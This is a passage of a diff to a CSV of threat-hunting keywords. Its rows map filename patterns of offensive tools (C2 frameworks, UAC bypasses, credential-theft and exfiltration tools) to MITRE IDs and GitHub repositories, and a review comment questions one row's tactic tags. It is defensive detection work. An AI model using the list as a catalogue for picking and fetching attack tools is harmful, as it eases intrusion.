security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/scannerPort.go*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" -"*/Scans/servers_all_smb*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/scan-network.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Scans/servers_all_smb*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/ScareCrow -I *","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/sccmhunter*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" -"*/schtasksenum/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/schtasksenum/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/SCMUACBypass.git*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" 
@@ -5117,23 +5171,24 @@ "*/ScriptSentry.psm1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*/ScRunHex.py*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*/scshell*","offensive_tool_keyword","scshell","SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. 
It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*/scshell.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/scshell.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/scuffy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/searchsploit*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/Seatbelt.txt*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*/Seatbelt/Commands*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*/SeBackupPrivilege.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1572","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/Seatbelt/Commands*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*/SeBackupPrivilege.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/secinject.c*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" 
-"*/SecretFinder.git*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" -"*/secretsdump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/SecretFinder.git*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*/secretsdump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/sec-tools/litefuzz*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation 
tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*/SeeYouCM-Thief*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*/self_delete.cna*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*/SeManageVolumeExploit.git*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - 
TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" -"*/SeriousSam.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/server/c2/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/SeriousSam.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 
- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/server/c2/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/server/common/stagers.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - 
T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*/ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data 
Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*/servers/dns_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/servers/icmp_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/servers/smb_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
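Review bot: The added `*/scuffy.py*` row puts NetExec in category `Credential Access`, but its tactic column (`TA0007 - TA0003 - TA0002 - TA0001`) has no TA0006 and omits TA0008 even though T1021 (Remote Services) is a lateral-movement technique; none of the four listed techniques belongs to TA0001 or TA0002 either. Anyone who routes or scores matches by tactic or category will triage this keyword inconsistently, so I would derive the tactic field from the techniques, e.g. `"T1069 - T1021 - T1136 - T1018","TA0003 - TA0007 - TA0008"`, and either change the category or add the credential-access technique that justifies it together with TA0006. The same metadata is reused for the `*/shadowcoerce.py*` NetExec row added in the next hunk, where the keyword also duplicates the existing exegol row directly above it with a different `metadata_enable_proxy_detection` value (`0` vs `1`), which makes a keyword-keyed lookup ambiguous.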
@@ -5145,24 +5200,25 @@ "*/ServerScanForWindows/PE*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServiceMove-BOF/*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 